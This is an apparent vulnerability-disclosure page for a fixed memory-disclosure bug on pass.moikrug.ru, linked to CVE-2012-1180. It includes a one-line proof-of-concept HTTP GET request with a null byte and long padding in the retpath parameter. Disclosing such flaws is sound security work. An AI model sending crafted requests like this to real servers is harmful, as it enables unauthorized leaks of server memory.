Main / Vulnerabilities / pass.moikrug.ru / BC#29

BC #29 - [Fixed] memory disclosure on pass.moikrug.ru

Description Memory disclosure with specially crafted backend responses (CVE-2012-1180)

PoC:
GET /?retpath=http://yandex.ru%00aaaaaaaaaaaaaaa....aaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: pass.moikrug.ru
Founded 2012-09-21
Exploit http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1180
Video N/A

* only for registered users

Created at 01 Oct'2013 04:00:23 | BlackFan | 3316

Comments

No comments right now. Be first!
Leave comment as guest (email/website/twitter will be public)